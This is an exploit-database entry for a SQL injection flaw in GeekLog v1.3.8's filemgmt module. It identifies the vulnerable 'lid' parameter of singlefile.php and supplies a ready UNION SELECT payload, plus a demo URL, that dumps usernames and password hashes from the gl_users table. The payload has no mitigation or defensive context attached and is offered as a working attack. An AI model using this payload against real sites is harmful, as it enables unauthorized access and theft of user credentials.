GeekLog v1.3.8 (filemgmt) SQL Injection Vulnerability

2010-09-24T00:00:00
ID 1337DAY-ID-14173
Type zdt
Reporter Gamoscu
Modified 2010-09-24T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            =====================================================
GeekLog v1.3.8 (filemgmt) SQL Injection Vulnerability
=====================================================

Author : Gamoscu
 
Homepage : http://www.1923turk.com
 
Blog :http://gamoscu.wordpress.com/
 
Script : http://www.geeklog.net/filemgmt/viewcat.php?cid=8
 
Download:http://www.geeklog.net/filemgmt/viewcat.php?cid=8
 
###########################
 
[ Vulnerable File ]
 
filemgmt/singlefile.php?lid=1 [ SQL ]
 
[ XpL ]
 
-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--
 
[ Demo]
 
http://server/filemgmt/singlefile.php?lid=-1+union+all+select+1,2,concat_ws(username,0x3a,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16+from+gl_users+limit+1,1--
 
##############################################################
#
#
#
# Baybora: http://baybora.wordpress.com/





#  0day.today [2018-01-09]  #